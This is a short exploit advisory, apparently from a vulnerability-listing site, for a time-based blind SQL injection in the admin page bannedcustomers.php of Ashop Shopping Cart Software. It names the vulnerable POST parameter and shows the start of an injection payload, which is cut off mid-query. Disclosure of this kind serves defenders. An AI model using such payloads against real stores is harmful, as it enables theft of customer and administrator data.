Ashop Shopping Cart Software SQL Injection

Ashop Shopping Cart Software suffers from a remote SQL injection vulnerability in bannedcustomers.php.

MD5 | a9726e6a13c0a86e9804ac4e80b99eca

# Exploit Title: Ashop Shopping Cart Software - SQL Injection
# Date: 08.04.2019
# Exploit Author: Doğukan Karaciğer
# Vendor Homepage:
# Software Link:
# Demo Site:
# Version: Lastest
# Tested on: Ubuntu-trusty-64
# CVE: N/A

----- PoC: SQLi -----

Request: http://localhost/[PATH]/admin/bannedcustomers.php
Parameter: blacklistitemid (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: blacklistitem=1&deletebutton=Delete&blacklistitemid=1 AND (SELECT

Related Posts